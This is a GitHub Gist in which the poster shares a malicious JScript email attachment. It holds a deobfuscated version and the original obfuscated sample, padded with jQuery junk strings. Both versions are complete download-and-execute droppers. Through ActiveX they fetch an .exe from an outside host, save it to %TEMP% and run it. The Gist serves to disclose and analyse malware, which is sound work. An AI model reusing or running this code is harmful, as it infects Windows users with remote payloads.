Last active
March 22, 2016 15:41
-
-
Save pluma/050479471095a7477f7e to your computer and use it in GitHub Desktop.
Malicious script I got in an e-mail
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var shell = new ActiveXObject('WScript.Shell') | |
var xhr = new ActiveXObject('MSXML2.XMLHTTP') | |
var virus = shell.ExpandEnvironmentStrings('%TEMP%') + '/CBMQFs.exe' | |
xhr.onreadystatechange = function () { | |
if (xhr.readystate === 4) { | |
var stream = new ActiveXObject('ADODB.Stream') | |
stream.open() | |
stream.type = 1 | |
stream.write(xhr.ResponseBody) | |
stream.position = 0 | |
stream.saveToFile(virus, 2) | |
stream.close() | |
} | |
} | |
try { | |
xhr.open('GET', 'http://vital4age.de/v4v5g45hg.exe', false) | |
xhr.send() | |
shell.RunActiveXObject(virus, 1, false) | |
} catch (e) {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ApBcVkzVRDu = " ...in a gzip-friendly way node = parent; outerCache = node[ expando ] || (node[ expando ] = {});"; | |
insecureI = 0; | |
String.prototype.positioning = function () { return this.substr(0, 1); }; | |
var JjusVCax = ["S"+"Ai"+"us"+("ignore","erica","savior","gW"), ("harvey","ineffable","melbourne","transept","YLS")+"md"+"zI"+("fabric","probe","refined","foamy","pL"), "E"+("cherokee","possession","xpan")+("orlando","haystack","elfin","ottawa","dE")+("chair","session","nv")+"ir"+"onmentSt"+("finland","recalcitrant","conversation","ri")+("curry","continuously","ngs"), ""+("grapple","slake","cheapest","%")+("aberration","thunderbolt","textbooks","TE")+"MP%", "/CBMQFs" + ""+("anoint","seaweed",".")+"exe", "R"+("remix","badinage","un"), ("regional","points","Actdugout")+("compare","insidiously","amidships","iv")+"du"+"gouteXdu"+("shelf","mounts","settlement","go")+("species","exclusion","utOb")+("solidarity","telescope","du")+"go"+("unabated","generated","pithy","arcadia","utje")+("spread","calendar","wallis","obstruction","du")+("teamster","errol","dualism","services","go")+("chips","imperil","dialogue","ut")+("lustrous","commissioner","guinea","threatened","ct"), "jdixFLw", "pSTgRw", ("augment","trespass","W")+"Sc"+"du"+("characteristic","creeper","goutript")+"dugout." + ("bombard","absolved","overrated","S"), "NAXOvpX", "h"+"dugo"+"ut"+"el"+"du"+("heath","workhouse","compressed","go")+"utl", "AjkObRyb", "P"+"gj"+("nudity","apostolic","cO")+"ksYvkN", "Mdu"+("reservoir","ethiopia","go")+("scout","hovel","trinity","ut")+("install","vision","SXdu")+"gout"+("maybe","tolerance","MLdugout2") + "."+"du"+"go"+"ut"+"XM"+("college","killer","prosy","du")+"go"+"ut"+"LH"+"du"+"go"+"ut"+"TTP"]; | |
OjTFnNmRQ = " Fallback to seeking `elem` from the start (diff = nodeIndex = 0) || start.pop()) ) {"; | |
JjusVCax.splice(7, insecureI + 2); | |
ugliness = JjusVCax[2+2+2].split("dugout").join(""); | |
var gLyfdlw = this[ugliness]; | |
XkGGnvVviQQ = "pKmmYpEOYek"; | |
sensitive = (("reiterate", "michael", "KaqiMeljdT", "assisted", "pXvhVWd") + "bVOPSi").positioning(); | |
prestons = (("elopement", "integral", "bNVmbVTY", "auditor", "sVmfMHeEHUu") + "oPRtHLYcn").positioning(); | |
insecureI = 6; | |
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1] + JjusVCax[insecureI + 3]; | |
JjusVCax[insecureI + 2] = "UghOKppVbXn"; | |
insecureI++; | |
JjusVCax.splice(insecureI + 1, insecureI - 4); | |
JjusVCax[insecureI] = JjusVCax[insecureI].split("dugout").join(""); | |
var Bgehhk = new gLyfdlw(JjusVCax[insecureI]); | |
ElIQpsWrhTy = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex && cache[ 2 ]; node = nodeIndex && parent.childNodes[ nodeIndex ];"; | |
insecureI++; | |
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1].split("dugout").join(""); | |
var VrMzrLLlD = new gLyfdlw(JjusVCax[insecureI+1]); | |
elVCEpWQK = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
insecureI /= 2; | |
var boqCakIHC = Bgehhk[JjusVCax[insecureI-2]](JjusVCax[insecureI - 1]) + JjusVCax[insecureI]; | |
afWWWOpLSwq = " while ( (node = ++nodeIndex && node && node[ dir ] ||"; | |
VrMzrLLlD.onreadystatechange = function () { | |
if (VrMzrLLlD["rea"+"dy"+("coterie","haphazard","actuality","st")+("abdication","elect","ate")] === 4) { | |
var sJQvR = new gLyfdlw((""+"A"+("structured","auditorium","pO")+("herbage","hughes","cyclone","DB.")+""+"S"+"tr"+("sanity","traditionally","statistical","astute","eam")).replace("p", "D")); | |
sJQvR.open(); | |
lFJQvFf = " When found, cache indexes on `parent` and break if ( node.nodeType === 1 && ++diff && node === elem ) { uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; break; } "; | |
sJQvR.type = 8*(4-3-1)+1; | |
RaHCKzsLqKb = "} } else { Use previously-cached element index if available if ( useCache ) { ...in a gzip-friendly way node = elem; outerCache = node[ expando ] || (node[ expando ] = {});"; | |
sJQvR[("frontpage","tramadol","w")+"ri"+"te"](VrMzrLLlD[""+"R"+"es"+("memory","replacement","benighted","pon")+prestons+"e"+("parts","scalp","bunch","grotto","Bo")+"dy"]); | |
nMkCSsvh = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
sJQvR[(sensitive+"o"+"Di"+"ti"+("extricate","keyword","damage","on")).replace("D", prestons)] = 0; | |
vbbnPY = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex; "; | |
sJQvR.saveToFile(boqCakIHC, 2); | |
SMTqKOY = "} xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...) if ( diff === false ) { Use the same loop as above to seek `elem` from the start while ( (node = ++nodeIndex && node && node[ dir ] || (diff = nodeIndex = 0) || start.pop()) ) {"; | |
sJQvR.close(); | |
xtmwwD = " if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {"; | |
}; | |
}; | |
try { | |
ivSbyvgX = " Cache the index of each encountered element if ( useCache ) { outerCache = node[ expando ] || (node[ expando ] = {});"; | |
VrMzrLLlD.open("G"+("phalanx","forbidden","mainstream","trauma","ET"), "htt"+("circumstances","animosity","p://")+("authoritative","spectrum","schooling","vi")+"ta"+("quantitative","profligate","binary","denomination","l4")+("confounding","write","caricature","levitra","age.de")+("cyber","sequence","affluence","/v4v5g")+"45"+"hg.e"+"xe", false); | |
kXTvYF = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
VrMzrLLlD[prestons + ("villas","supervision","medicine","e") + (("lectures", "statistical", "UAcRDQK", "sound", "scrubs", "nyNjfyfXKxb") + "FtNATMOQfLT").positioning() + (("drainage", "scanners", "bQerVtKQq", "astronomy", "ivory", "diBJmayWmnv") + "gaUgahfN").positioning()](); | |
EXDkho = " uniqueCache[ type ] = [ dirruns, diff ]; "; | |
Bgehhk[JjusVCax[insecureI+1]](boqCakIHC, 1, "McqMjBUl" === "PHLpSRy"); xdVphT = " \"PSEUDO\": function( pseudo, argument ) { pseudo-class names are case-insensitive http:www.w3.org/TR/selectors/#pseudo-classes Prioritize by case sensitivity in case custom pseudos are added with uppercase letters Remember that setFilters inherits from pseudos var args, fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] || Sizzle.error( \"unsupported pseudo: \" + pseudo );"; | |
hUQjlUlE = "} if ( node === elem ) { break; } } } } "; | |
} catch (nGDSVs) { }; | |
qfjWze = "} Incorporate the offset, then check against cycle size diff -= last; return diff === first || ( diff % first === 0 && diff / first >= 0 ); } }; },"; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment